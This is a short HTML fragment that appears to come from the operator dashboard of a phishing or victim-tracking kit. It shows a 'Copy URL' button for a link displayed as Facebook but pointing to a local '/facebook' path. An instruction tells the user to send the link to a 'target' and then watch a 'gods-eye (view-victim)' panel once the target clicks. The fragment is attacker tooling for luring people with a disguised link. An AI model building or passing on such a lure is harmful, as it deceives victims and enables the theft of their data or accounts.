<div class="content-inner">
    <div class="facebook">
        <img src="/uploads/YouTube.jpg" alt="Dashboard Image" class="image">

        <div class="url">
            <button onclick="copyFacebookLink()">Copy URL</button>
            <a id="facebookLink" href="/facebook">https//www.facebook.com</a>
        </div>

        <p><strong>Instruction:</strong> Copy the link and send it to your target, when the target hits in check your🗿gods-eye🗿(view-victim) </p>
    
    </div>
</div>